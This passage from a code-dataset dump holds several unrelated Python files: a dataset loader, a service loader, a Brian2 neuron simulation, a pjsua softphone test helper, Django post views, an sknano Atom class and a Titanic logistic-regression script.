os.scandir(os.path.join(self.ann_dir, images_dir)) as scanner:\n            for idx, entry in enumerate(scanner):\n                if idx == relative_idx:\n                    select_file = entry.name\n                    break\n        if not select_file:\n            raise RuntimeError(\"search image failed, can not find {} group files in\"\n                               \" file {}\".format(item, self._idx_dict[i]))\n        select_file = \"{}/{}\".format(images_dir, select_file.replace(\".txt\", \"\"))\n        return select_file\n\n    def fix_label_error(self, annotations):\n        for i in range(annotations.shape[0]):\n            annotations[i, 0] = self.o2n[int(annotations[i, 0])]\n\n    def load_data(self, idx):\n        image, anns = super(TrainLoader, self).load_data(idx)\n        self.fix_label_error(anns)\n        # labels_hierarchy = multi_label_handler(anns, self.label_hierarchy)\n        return image, anns\n\n    def load_classes(self):\n        cls2idx, idx2cls, cls2Name, hi = super(TrainLoader, self).load_classes()\n        
self.o2n = old2new(cls2idx)\n\n return cls2idx, idx2cls, cls2Name, hi\n\n\nif __name__ == \"__main__\":\n\n from config import cfg\n from utils.visualization import plt_bboxes\n root_path = cfg.FILE.BASE_PATH\n trains = TrainLoader(os.path.join(root_path, \"data/oid\"),\n help_file=os.path.join(root_path, \"data/train_info.txt\"))\n vals = ImageLoader(os.path.join(root_path, \"data/oid\"), \"validation\")\n print(vals.idx2class)\n print(trains.class2name[trains.idx2class[47]])\n # for i in range(20):\n # image, anns = trains[i]\n # plt_bboxes(image, anns, trains)\n","sub_path":"datasets/oid.py","file_name":"oid.py","file_ext":"py","file_size_in_byte":11726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11640553","text":"import os\nimport sys\nimport imp\nimport inspect\nimport pkgutil\nimport logging\n\nfrom gloria.service import decorator\nfrom gloria.service.runnable import Service\n\n\nclass Loader:\n \"\"\"\n TODO:\n ########################################################################\n # 1. More comments\n ########################################################################\n Put a few words on how tasks get 'loaded':\n how we search in a directory,\n how __import__ trigers the decorator,\n how we rely on the decorator to notify us when a class is being wrapped,\n and so on...\n\n ########################################################################\n # 2. Implement dependencies...\n ########################################################################\n \"\"\"\n global_loaded_tasks = set()\n\n def __init__(self, tasks_dir=''):\n self._tasks_dir = tasks_dir\n\n if tasks_dir not in sys.path:\n sys.path.append(tasks_dir)\n\n self._loaded_tasks = []\n\n # Set up a callback for our decorator to call,\n # when task class is being wrapped\n decorator.on_task_wrapped = self._on_wrapped\n\n def tasks(self):\n return self._loaded_tasks\n\n def load_tasks(self):\n logging.info('Inspecting directory [{0}] for tasks'.format(self._tasks_dir))\n possible_tasks = list(pkgutil.walk_packages(path=[self._tasks_dir]))\n\n if not possible_tasks:\n logging.warning('Didn\\'t find any tasks, skipping')\n return 0\n\n logging.info('Found {0} possible tasks, trying to import them'.format(len(possible_tasks)))\n\n for loader, task, ispkg in possible_tasks:\n if not ispkg:\n self._import_task(task)\n\n self._log_loaded_tasks()\n return len(self._loaded_tasks)\n\n def _on_wrapped(self, wrapped_task):\n logging.debug('task wrapped: {0}'.format(type(wrapped_task)))\n self._loaded_tasks.append(\n (wrapped_task,\n self._task_properties_dict(wrapped_task, decorator.Property),\n self._task_properties_dict(wrapped_task, decorator.Command))\n )\n\n def _task_properties_dict(self, klass, decorator_type):\n props = filter(lambda m: isinstance(m[1], decorator_type), inspect.getmembers(klass))\n logging.debug('props: {0}'.format(props))\n return dict(props)\n\n def _log_loaded_tasks(self):\n if len(self._loaded_tasks) == 0:\n logging.warning('No tasks were loaded')\n return\n\n logging.info('#' * 30)\n logging.info('Loaded {0} tasks:'.format(len(self._loaded_tasks)))\n logging.info('#' * 30)\n\n def _log_task(klass, prop, commands):\n logging.info('Task:')\n logging.info('... class name=\"{0}\"'.format(klass.__name__))\n logging.info('... description=\"{0}\"'.format(klass.__doc__ if klass.__doc__ is not None else 'No description available'))\n logging.info('... enabled={0}'.format(klass.enabled))\n logging.info('... 
autostart={0}'.format(klass.autostart))\n logging.info('... respawn={0}'.format(klass.respawn))\n #logging.info('... properties: {0}'.format(properties))\n\n for k, p, c in self._loaded_tasks:\n _log_task(k, p, c)\t\n\n def _import_task(self, task):\n logging.info('... importing task [{0}]'.format(task))\n try:\n # If the task is decorated with task,\n # this decoration will cause on_wrapped to be called.\n imported_task = __import__(task, fromlist=[task])\n logging.debug(imported_task.__name__)\n\n if imported_task.__name__ in Loader.global_loaded_tasks:\n reload(imported_task)\n\n Loader.global_loaded_tasks.add(imported_task.__name__)\n\n except ImportError as err:\n logging.error('Can\\'t import [{0}]: {1}'.format(task, err))\n\n\nclass ServiceLoader:\n def __init__(self, services_dirs=[]):\n self._loaded_services = []\n self._services_dirs = services_dirs\n self._tasks_dir = None\n\n # Set up a callback for our decorator to call,\n # when service class is beign wrapped\n decorator.on_service_wrapped = self._on_wrapped\n\n def load_services(self):\n for svc_dir in self._services_dirs:\n self.load_service(svc_dir)\n\n def load_service(self, service_dir):\n logging.info('Inspecting directory [{0}] for services'.format(service_dir))\n\n if self._is_init_py_present(service_dir):\n self._log_and_call(self._import_init_py, service_dir, '__init__.py is present')\n else:\n self._log_and_call(self._decorate_dummy_service, service_dir, '__init__.py is not present, using default service')\n\n def _log_and_call(self, func, param, log_msg):\n logging.info(log_msg)\n func(param)\n\n # Make ServiceLoader iteratable\n # i.e., make it possible to iterate over loaded services\n def __iter__(self):\n self.it = iter(self._loaded_services)\n return self\n\n def __len__(self):\n return len(self._loaded_services)\n\n def __next__(self):\n return next(self.it)\n\n def _is_init_py_present(self, service_dir):\n return True if '__init__.py' in os.listdir(service_dir) else False\n\n def _import_init_py(self, service_dir):\n logging.info('... 
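# Minimal sketch of the "import triggers the decorator" discovery pattern that the Loader
# docstring above describes (the names are illustrative, not the gloria API):
_registry = []

def task(cls):
    _registry.append(cls)   # importing a module with @task classes fires this at import time
    return cls

@task
class ExampleTask:
    """A task discovered purely by being imported."""

# After __import__("some_module") runs, _registry holds every @task class the module defined.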
importing service __init__.py')\n try:\n sys.path.append(service_dir)\n imported_init_py = imp.load_module(service_dir, *imp.find_module('__init__', [service_dir]))\n except ImportError as err:\n logging.error('Can\\'t import __init__.py: {0}'.format(err))\n\n def _decorate_dummy_service(self, service_dir):\n \"\"\"\n Create dummy service and decorate it with the default tasks directories\n (i.e., scan all the subdirectories in service_dir and try to import all the files in each subdirectory)\n \"\"\"\n tasks_dirs = []\n for tasks_dir in [d for d in os.listdir(service_dir) if os.path.isdir(os.path.join(service_dir, d))]:\n tasks_dirs.append(service_dir + '/' + tasks_dir)\n\n decorator.service(tasks_dirs)(Service, os.path.basename(service_dir))\n\n def _on_wrapped(self, wrapper):\n self._loaded_services.append(wrapper.wrapped_class(wrapper.wrapped_tasks, wrapper.wrapped_class.__doc__))\n","sub_path":"service/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"221931746","text":"import brian2 as bs\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom bayesian_test.utils import visualise_connectivity\n\nw_input_to_place = 26.0 * bs.mV\nTAU_M = 17.0 * bs.ms\nTAU_S = 5.0 * bs.ms\nthreshold = -55.0 * bs.mV\nv_rest = -80.0 * bs.mV\nv_reset = -80.0 * bs.mV\ne = 2.71828182846\nbs.seed(seed=19971124)\n\ndt = 0.1\n\nlif = \"\"\"\n dv/dt = (v_rest - v)/tau_m : volt (unless refractory)\n tau_m : second\n \"\"\"\n\nsynaptic_update = \"\"\"\n v_post += w_input_to_place\n \"\"\"\n\nthreshold_eq = \"v > (1+1/e)*(w_input_to_place + v_rest) + w_input_to_place\"\nreset_eq = \"v = v_reset\"\n\nSIM_TIME = 5\n\n\ndef generate_gaussian_spike_train(mean, std):\n \"\"\"\n https://brian2.readthedocs.io/en/stable/user/input.html use timed arrays\n \"\"\"\n coef = 1 / (std * (2 * np.pi) ** (0.5))\n train = []\n time = np.linspace(0, SIM_TIME, num=int(SIM_TIME / dt))\n train = np.zeros_like(time)\n for i, t in enumerate(time):\n print(t)\n exp = -0.5 * ((t - mean) / std) ** 2\n rate = coef * np.exp(exp)\n train[i] = rate\n\n train = train * 40\n plt.plot(time, train)\n plt.xlabel('Time (ms)')\n plt.ylabel('Rates')\n plt.title(f\"SpikeTrain\")\n plt.show()\n return train\n\n\ndef interp_based(a, N=10):\n s = N\n l = (a.size - 1) * s + 1 # total length after interpolation\n return np.interp(np.arange(l), np.arange(l, step=s), a)\n\n\ndef simulation1():\n bs.start_scope()\n\n rates = [5, 10, 15]\n bs.store()\n\n train1 = generate_gaussian_spike_train(mean=1.5, std=1.7)\n train2 = generate_gaussian_spike_train(mean=3, std=1.7)\n # exit(0)\n train_len = train1.shape[0]\n # train_len = 10\n\n total_time = None\n total_spikes = None\n\n for i in range(train_len):\n r1 = train1[i]\n r2 = train2[i]\n place_cell = bs.NeuronGroup(1, model=lif, reset=reset_eq, threshold=threshold_eq, refractory=TAU_M,\n method=\"euler\")\n\n place_cell.tau_m = TAU_M\n # place_cell.tau_s = TAU_S\n\n place_cell.v = -80.0 * bs.mV\n\n print(f\"Rates: {r1, r2}\")\n # bs.restore()\n input = bs.PoissonGroup(2, rates=np.array([r1, r2]) * bs.Hz)\n\n # connect input poisson spike generator to the input cells (grid and boundary vector)\n S1 = bs.Synapses(input, place_cell, on_pre=synaptic_update)\n S1.connect = S1.connect(i=[0, 1], j=0)\n step_per_time = 100\n place_cell_v_monitor = bs.StateMonitor(place_cell, 'v', record=True, dt=(dt / step_per_time) * bs.second)\n\n place_cell_monitor = 
bs.SpikeMonitor(source=place_cell)\n\n bs.run(dt * bs.second)\n\n spikes_i = place_cell_monitor.i\n spikes_t = place_cell_monitor.t\n\n print(spikes_i)\n print(spikes_t)\n\n if total_spikes is None:\n total_spikes = spikes_t / bs.ms\n else:\n total_spikes = np.concatenate([total_spikes, (i * step_per_time) + spikes_t / bs.ms])\n\n print(\"time\", place_cell_v_monitor.t / bs.ms)\n if total_time is None:\n total_time = place_cell_v_monitor.t / bs.ms\n else:\n total_time = np.concatenate([total_time, (i * step_per_time) + place_cell_v_monitor.t / bs.ms])\n total_time = interp_based(total_time, N=10)\n print(type(total_time))\n print(total_time.shape)\n print(total_time)\n print(total_spikes)\n plt.figure()\n _, ind, _ = np.intersect1d(total_time, total_spikes, assume_unique=True, return_indices=True)\n spikes = np.zeros_like(total_time)\n spikes[ind] = 1\n plt.plot(total_time, spikes)\n plt.xlabel('Time (ms)')\n plt.ylabel('v')\n plt.title(f\"Spikes\")\n plt.show()\n # print(spikes_i, spikes_t)\n # print(place_cell_v_monitor.v)\n # print(type(place_cell_v_monitor.t), type(place_cell_v_monitor.v[0]))\n # plt.figure()\n # plt.plot(place_cell_v_monitor.t / bs.ms, place_cell_v_monitor.v[0])\n # plt.xlabel('Time (ms)')\n # plt.ylabel('v')\n # plt.title(f\"Rates: {r1, r2}\")\n # plt.show()\n\n\nif __name__ == '__main__':\n simulation1()\n","sub_path":"bayesian_test/place_cell_paper_result_second_try.py","file_name":"place_cell_paper_result_second_try.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"475072978","text":"\"\"\"Class functions related to softphone software.\"\"\"\nfrom boardfarm.lib.dns import DNS\nfrom boardfarm.lib.installers import install_pjsua\n\n\nclass SoftPhone(object):\n \"\"\"Perform Functions related to softphone software.\"\"\"\n\n model = \"pjsip\"\n profile = {}\n\n def __init__(self, *args, **kwargs):\n \"\"\"Instance initialization.\"\"\"\n self.args = args\n self.kwargs = kwargs\n self.own_number = self.kwargs.get(\"number\", \"3000\")\n self.num_port = self.kwargs.get(\"num_port\", \"5060\")\n self.config_name = \"pjsip.conf\"\n self.pjsip_local_url = kwargs.get(\"local_site\", None)\n self.pjsip_prompt = \">>>\"\n self.profile[self.name] = self.profile.get(self.name, {})\n softphone_profile = self.profile[self.name] = {}\n softphone_profile[\"on_boot\"] = self.install_softphone\n self.dns = DNS(self, kwargs.get(\"options\", {}), kwargs.get(\"aux_ip\", {}))\n\n def __str__(self):\n \"\"\"Magic method to return a printable string.\"\"\"\n return \"softphone\"\n\n def install_softphone(self):\n \"\"\"Install softphone from local url or from internet.\"\"\"\n self.prefer_ipv4()\n install_pjsua(self, getattr(self, \"pjsip_local_url\", None))\n\n def phone_config(self, sipserver_ip):\n \"\"\"Configure the soft phone.\n\n Arguments:\n sipserver_ip(str): ip of sip server\n \"\"\"\n conf = (\n \"\"\"(\n echo --local-port=\"\"\"\n + self.num_port\n + \"\"\"\n echo --id=sip:\"\"\"\n + self.own_number\n + \"\"\"@\"\"\"\n + sipserver_ip\n + \"\"\"\n echo --registrar=sip:\"\"\"\n + sipserver_ip\n + \"\"\"\n echo --realm=*\n echo --username=\"\"\"\n + self.own_number\n + \"\"\"\n echo --password=1234\n echo --null-audio\n echo --max-calls=1\n echo --auto-answer=180\n )> \"\"\"\n + self.config_name\n )\n self.sendline(conf)\n self.expect(self.prompt)\n\n def phone_start(self):\n \"\"\"Start the soft phone.\n\n Note: Start softphone only when asterisk server is running to avoid 
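# The generate_gaussian_spike_train() docstring above points to Brian2's TimedArray input
# mechanism; a compact sketch (toy numbers) of driving a PoissonGroup with a time-varying rate:
import numpy as np
import brian2 as bs

rate_profile = bs.TimedArray(np.array([5, 20, 40, 20, 5]) * bs.Hz, dt=100 * bs.ms)
noisy_input = bs.PoissonGroup(1, rates='rate_profile(t)')  # the rate is looked up each timestep
spikes = bs.SpikeMonitor(noisy_input)
bs.run(500 * bs.ms)
# Note that Synapses.connect() is called for its side effect and returns None, so the
# "S1.connect = S1.connect(i=[0, 1], j=0)" line in simulation1() above should simply read
# "S1.connect(i=[0, 1], j=0)".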
failure\n \"\"\"\n self.sendline(\"pjsua --config-file=\" + self.config_name)\n self.expect(r\"registration success, status=200 \\(OK\\)\")\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n\n def dial(self, dial_number, receiver_ip):\n \"\"\"Dial to the other phone.\n\n Arguments:\n dial_number(str): number to dial\n receiver_ip(str): ip of the receiver,it is mta ip the call is dialed to mta\n \"\"\"\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n self.sendline(\"m\")\n self.expect(r\"Make call\\:\")\n self.sendline(\"sip:\" + dial_number + \"@\" + receiver_ip)\n self.expect(\"Call [0-9]* state changed to CALLING\")\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n\n def answer(self):\n \"\"\"To answer the incoming call in soft phone.\"\"\"\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n self.sendline(\"a\")\n self.expect(r\"Answer with code \\(100\\-699\\) \\(empty to cancel\\)\\:\")\n self.sendline(\"200\")\n self.expect(\"Call [0-9]* state changed to CONFIRMED\")\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n\n def hangup(self):\n \"\"\"To hangup the ongoing call.\"\"\"\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n self.sendline(\"h\")\n self.expect(\"DISCON\")\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n\n def reinvite(self):\n \"\"\"To re-trigger the Invite message\"\"\"\n self.sendline(\"\\n\")\n self.expect(self.pjsip_prompt)\n self.sendline(\"v\")\n self.expect(\"Sending re-INVITE on call [0-9]*\")\n self.expect(\"SDP negotiation done: Success\")\n self.sendline(\"\\n\")\n self.expect(self.pjsip_prompt)\n\n def hold(self):\n \"\"\"To hold the current call\"\"\"\n self.sendline(\"\\n\")\n self.expect(self.pjsip_prompt)\n self.sendline(\"H\")\n self.expect(\"Putting call [0-9]* on hold\")\n self.sendline(\"\\n\")\n self.expect(self.pjsip_prompt)\n\n def phone_kill(self):\n \"\"\"To kill the pjsip session.\"\"\"\n # De-Registration is required before quit a phone and q will handle it\n self.sendline(\"q\")\n self.expect(self.prompt)\n\n def validate_state(self, msg):\n \"\"\"Verify the message to validate the status of the call\n\n :param msg: The message to expect on the softphone container\n :type msg: string\n :example usage:\n validate_state('INCOMING') to validate an incoming call.\n validate_state('Current call id= to [CONFIRMED]') to validate call connected.\n :return: boolean True if success\n :rtype: Boolean\n \"\"\"\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n if msg == \"INCOMING\":\n msg = \"180 Ringing\"\n self.expect(msg)\n self.expect(self.pjsip_prompt)\n return True\n","sub_path":"boardfarm/devices/softphone.py","file_name":"softphone.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"534832023","text":"from django.shortcuts import render, get_object_or_404\nfrom django.shortcuts import redirect\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom .forms import *\nfrom .models import *\nfrom events.models import Event\nfrom django.utils import timezone\nfrom notify.signals import notify\nfrom django.contrib.auth.decorators import login_required\nfrom czaswolny.decorators import user_not_banned\nfrom django.views.decorators.http import require_POST\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\n@login_required\n@user_not_banned\ndef index(request):\n return render(request, 
'posts/index.html')\n\n\n@login_required\n@user_not_banned\ndef create(request, pk):\n if request.method == \"POST\":\n event = get_object_or_404(Event, pk=pk)\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.publish_date = timezone.now()\n post.save()\n event.posts.add(post)\n return redirect('events:details', pk=event.pk)\n else:\n form = PostForm()\n return render(request, 'posts/create.html', {'form': form})\n\n\n@login_required\n@user_not_banned\ndef createcomment(request, pk, pk2):\n if request.method == \"POST\":\n post = get_object_or_404(Post, pk=pk)\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = request.user\n comment.publish_date = timezone.now()\n comment.save()\n post.comments.add(comment)\n if request.user != post.author:\n notify.send(request.user, recipient=post.author, actor=request.user, verb='commented your post.', nf_type='post_commented')\n return redirect('posts:details', pk=post.pk, pk2=pk2)\n else:\n form = CommentForm()\n return render(request, 'posts/createcomment.html', {'form': form})\n\n\n@login_required\n@user_not_banned\ndef details(request, pk, pk2):\n if pk is None:\n return HttpResponseRedirect(reverse('events:index'))\n if pk2 is None:\n return HttpResponseRedirect(reverse('events:index'))\n\n post = get_object_or_404(Post, pk=pk)\n event = get_object_or_404(Event, pk=pk2)\n comments_all = post.comments.all().order_by('-publish_date')\n\n # Paginacja co 5 odpowiedzi\n paginator = Paginator(comments_all, 5)\n page = request.GET.get('page', 1)\n try:\n comments = paginator.page(page)\n except PageNotAnInteger:\n comments = paginator.page(1)\n except EmptyPage:\n comments = paginator.page(paginator.num_pages)\n\n return render(request, 'posts/details.html', {'post': post, 'event': event, 'comments': comments})\n\n\n@require_POST\n@login_required\n@user_not_banned\ndef destroy(request, pk, pk2):\n if pk is None:\n return HttpResponseRedirect(reverse('events:index'))\n event = get_object_or_404(Event, pk=pk2)\n post = get_object_or_404(Post, pk=pk)\n\n if request.user != post.author:\n return HttpResponseRedirect(reverse('events:index'))\n\n post.delete()\n return redirect('events:details', pk=event.pk)\n\n\n@require_POST\n@login_required\n@user_not_banned\ndef destroycomment(request, pk, pk2, pk3):\n if pk is None:\n return HttpResponseRedirect(reverse('events:index'))\n if pk2 is None:\n return HttpResponseRedirect(reverse('events:index'))\n event = get_object_or_404(Event, pk=pk2)\n post = get_object_or_404(Post, pk=pk)\n comment = get_object_or_404(Comment, pk=pk3)\n\n if request.user != comment.author:\n return HttpResponseRedirect(reverse('events:index'))\n\n comment.delete()\n return redirect('posts:details', pk=post.pk, pk2=event.pk)\n\n\n@require_POST\n@login_required\n@user_not_banned\ndef like(request, pk, pk2):\n if pk is None:\n return HttpResponseRedirect(reverse('posts:index'))\n\n post = get_object_or_404(Post, pk=pk)\n event = get_object_or_404(Event, pk=pk2)\n comments = post.comments.all()\n post.likes.add(request.user)\n\n return render(request, 'posts/details.html', {'post': post, 'event': event, 'comments': comments})\n\n\n@require_POST\n@login_required\n@user_not_banned\ndef unlike(request, pk, pk2):\n if pk is None:\n return HttpResponseRedirect(reverse('events:index'))\n\n post = get_object_or_404(Post, pk=pk)\n event = get_object_or_404(Event, pk=pk2)\n comments = post.comments.all()\n 
post.likes.remove(request.user)\n\n return render(request, 'posts/details.html', {'post': post, 'event': event, 'comments': comments})\n","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"177792672","text":"# -*- coding: utf-8 -*-\n\"\"\"\n============================================================================\nBase class for structure data atom (:mod:`sknano.structure_io.atoms._atom`)\n============================================================================\n\n.. currentmodule:: sknano.structure_io.atoms._atom\n\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n__docformat__ = 'restructuredtext en'\n\nfrom collections import OrderedDict\n\nimport numpy as np\n\nfrom ...tools import Vector, xyz_axes\nfrom ...tools.refdata import atomic_masses, atomic_mass_symbol_map, \\\n atomic_numbers, atomic_number_symbol_map, element_symbols\n\n__all__ = ['Atom']\n\n\nclass Atom(object):\n \"\"\"Base class for structure data atom.\n\n Parameters\n ----------\n element : {str, int}, optional\n A string representation of the element symbol or an integer specifying\n an element atomic number.\n x, y, z : float, optional\n :math:`x, y, z` coordinates of `Atom`.\n\n \"\"\"\n\n def __init__(self, element=None, m=None, x=None, y=None, z=None):\n\n self._r = Vector(x=x, y=y, z=z)\n\n self._m = None\n self._symbol = None\n self._Z = None\n\n if isinstance(element, (int, float)):\n self._Z = int(element)\n idx = self._Z - 1\n try:\n self._symbol = element_symbols[idx]\n self._m = atomic_masses[self._symbol]\n except KeyError:\n print('unrecognized element number: {}'.format(element))\n elif isinstance(element, str):\n self._symbol = element\n try:\n self._Z = atomic_numbers[self._symbol]\n self._m = atomic_masses[self._symbol]\n except KeyError:\n print('Unrecognized atomic symbol: {}'.format(element))\n else:\n self._symbol = None\n self._Z = None\n if m is not None and isinstance(m, (int, float)):\n try:\n if isinstance(m, float):\n self._symbol = atomic_mass_symbol_map[m]\n elif isinstance(m, int):\n self._symbol = atomic_number_symbol_map[int(m / 2)]\n self._Z = atomic_numbers[self._symbol]\n self._m = atomic_masses[self._symbol]\n except KeyError:\n self._symbol = None\n self._Z = None\n self._m = m\n else:\n self._m = 0\n\n self._atomdict = OrderedDict()\n self._atomdict['element'] = self._symbol\n self._atomdict['x'] = self._r.x\n self._atomdict['y'] = self._r.y\n self._atomdict['z'] = self._r.z\n\n self._attributes = ['symbol', 'Z', 'm', 'r']\n\n def __str__(self):\n \"\"\"Return string representation of atom.\"\"\"\n atom_str = ''\n for attr in self._attributes:\n atom_str += \\\n 'Atom {}: {}\\n'.format(attr, getattr(self, '_' + attr))\n return atom_str\n\n @property\n def atomdict(self):\n \"\"\"Return dictionary of atom attributes.\"\"\"\n return self._atomdict\n\n @property\n def Z(self):\n \"\"\"Atomic number :math:`Z`.\n\n Returns\n -------\n int\n Atomic number :math:`Z`.\n \"\"\"\n return self._Z\n\n @property\n def element(self):\n \"\"\"Element symbol.\n\n Returns\n -------\n str\n Element symbol.\n \"\"\"\n return self.symbol\n\n @property\n def symbol(self):\n \"\"\"Element symbol.\n\n Returns\n -------\n str\n Element symbol.\n \"\"\"\n return self._symbol\n\n @property\n def m(self):\n \"\"\"Atomic mass :math:`m_a` in atomic mass units.\n\n Returns\n -------\n float\n Atomic mass :math:`m_a` in atomic mass 
units.\n \"\"\"\n return self._m\n\n @property\n def x(self):\n \"\"\":math:`x`-coordinate in units of **Angstroms**.\n\n Returns\n -------\n float\n :math:`x`-coordinate in units of **Angstroms**.\n\n \"\"\"\n return self._r.x\n\n @x.setter\n def x(self, value=float):\n \"\"\"Set `Atom` :math:`x`-coordinate in units of **Angstroms**.\n\n Parameters\n ----------\n value : float\n :math:`x`-coordinate in units of **Angstroms**.\n\n \"\"\"\n self._r.x = self._atomdict['x'] = value\n\n @property\n def y(self):\n \"\"\":math:`y`-coordinate in units of **Angstroms**.\n\n Returns\n -------\n float\n :math:`y`-coordinate in units of **Angstroms**.\n\n \"\"\"\n return self._r.y\n\n @y.setter\n def y(self, value=float):\n \"\"\"Set `Atom` :math:`y`-coordinate in units of **Angstroms**.\n\n Parameters\n ----------\n value : float\n :math:`y`-coordinate in units of **Angstroms**.\n\n \"\"\"\n self._r.y = self._atomdict['y'] = value\n\n @property\n def z(self):\n \"\"\":math:`z`-coordinate in units of **Angstroms**.\n\n Returns\n -------\n float\n :math:`z`-coordinate in units of **Angstroms**.\n\n \"\"\"\n return self._r.z\n\n @z.setter\n def z(self, value=float):\n \"\"\"Set `Atom` :math:`z`-coordinate in units of **Angstroms**.\n\n Parameters\n ----------\n value : float\n :math:`z`-coordinate in units of **Angstroms**.\n\n \"\"\"\n self._r.z = self._atomdict['z'] = value\n\n @property\n def r(self):\n \"\"\":math:`x, y, z` coordinates of `Atom` in units of **Angstroms**.\n\n Returns\n -------\n ndarray\n 3-element ndarray of [:math:`x, y, z`] coordinates of `Atom`.\n\n \"\"\"\n return self._r.components\n\n @r.setter\n def r(self, value=np.ndarray):\n \"\"\"Set :math:`x, y, z` coordinates of `Atom`.\n\n Parameters\n ----------\n value : array_like\n 3-element array of :math:`x, y, z`-coordinates in units of\n **Angstroms**.\n\n \"\"\"\n self.x, self.y, self.z = value[0], value[1], value[2]\n\n def fix_minus_zero_coords(self, epsilon=1.0e-10):\n \"\"\"Set really really small negative coordinates to zero.\n\n Set all coordinates with absolute value less than\n epsilon zero so we don't end up with -0.00000\n coordinates in structure data output.\n\n Parameters\n ----------\n epsilon : float\n smallest allowed absolute value of any :math:`x,y,z` component.\n\n \"\"\"\n self._r.fix_minus_zero_components(epsilon=epsilon)\n\n def get_coords(self, components=None, as_dict=False):\n \"\"\"Return atom coords.\n\n Parameters\n ----------\n components : {None, sequence}, optional\n as_dict : bool, optional\n\n Returns\n -------\n coords : :py:class:`python:~collections.OrderedDict` or ndarray\n\n \"\"\"\n coords = self.r\n if as_dict:\n if components is None or components == 'r':\n components = ('x', 'y', 'z')\n elif isinstance(components, str):\n components = (components,)\n\n return OrderedDict(zip(\n components, [coords[xyz_axes.index(component)] for\n component in components]))\n else:\n return coords\n\n def rezero_coords(self, epsilon=1.0e-10):\n \"\"\"Re-zero position coordinates near zero.\n\n Set position coordinates with absolute value less than `epsilon` to\n zero.\n\n Parameters\n ----------\n epsilon : float\n smallest allowed absolute value of any :math:`x,y,z` component.\n\n \"\"\"\n self._r.rezero_components(epsilon=epsilon)\n","sub_path":"sknano/structure_io/atoms/_atom.py","file_name":"_atom.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"506278269","text":"# -*- coding: utf-8 
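# Aside: the coordinate setters above use a chained assignment so the Vector and
# the exported OrderedDict can never drift apart. A stripped-down sketch of the
# same pattern; the Point class here is illustrative, not part of sknano.
from collections import OrderedDict

class Point(object):
    def __init__(self, x=0.0):
        self._data = OrderedDict(x=x)
        self._x = x

    @property
    def x(self):
        return self._x

    @x.setter
    def x(self, value):
        # One statement updates both the attribute and its dict view.
        self._x = self._data['x'] = value

p = Point()
p.x = 2.5
assert p.x == p._data['x'] == 2.5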
-*-\n\"\"\"\nCreated on Sun Nov 25 21:20:54 2018\n\n@author: victor\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\n\ntrain = pd.read_csv('titanic_train.csv')\n\nplt.figure(figsize=(12,6))\nsns.heatmap(train.isnull(), yticklabels=False, cbar=False, cmap='viridis')\n\nsns.set_style('whitegrid')\nsns.countplot(x='Survived', data=train, hue='Pclass', palette='rainbow')\n\ntrain['Age'].hist(bins=30, color='darkred', alpha=0.4)\n\nsns.countplot(x='SibSp', data=train)\n\ntrain[train['SibSp']==0]['Age'].hist(bins=30)\n\nplt.figure(figsize=(12, 6))\nsns.boxplot(x='Pclass', y='Age', data=train)\n\ndef inputar_idade(cols):\n    idade = cols[0]\n    classe = cols[1]\n    \n    if(pd.isnull(idade)):\n        if(classe == 1):\n            return 37\n        elif(classe == 2):\n            return 29\n        else:\n            return 24\n    else:\n        return idade    \n\ntrain['Age'] = train[['Age', 'Pclass']].apply(inputar_idade, axis=1)\n\ndel train['Cabin']\n# train.drop('Cabin', axis=1, inplace=True)  # equivalent pandas idiom\n\ntrain.dropna(inplace=True)\n\n#plt.figure(figsize=(12,6))\n#sns.heatmap(train.isnull(), yticklabels=False, cbar=False, cmap='viridis')\n\nsex = pd.get_dummies(train['Sex'], drop_first=True)\n\nembark = pd.get_dummies(train['Embarked'], drop_first=True)\n\ntrain.drop(['Sex', 'PassengerId', 'Name', 'Ticket'], axis=1, inplace=True)\n\ntrain = pd.concat([train, sex, embark], axis=1)\n\ndel train['Embarked']\n\nx_train, x_test, y_train, y_test = train_test_split(train.drop('Survived', axis=1), train['Survived'], test_size=0.3)\n\nlogmodel = LogisticRegression()\n\nlogmodel.fit(x_train, y_train)\n\npredictions = logmodel.predict(x_test)\n\nprint(classification_report(y_test, predictions))\nprint()\nprint(confusion_matrix(y_test, predictions))\n","sub_path":"regressoesLogistica/aula02.py","file_name":"aula02.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"81471130","text":"#### PATTERN | DB ##################################################################################\n# -*- coding: utf-8 -*-\n# Copyright (c) 2010 University of Antwerp, Belgium\n# Author: Tom De Smedt <tom@organisms.be>\n# License: BSD (see LICENSE.txt for details).\n# 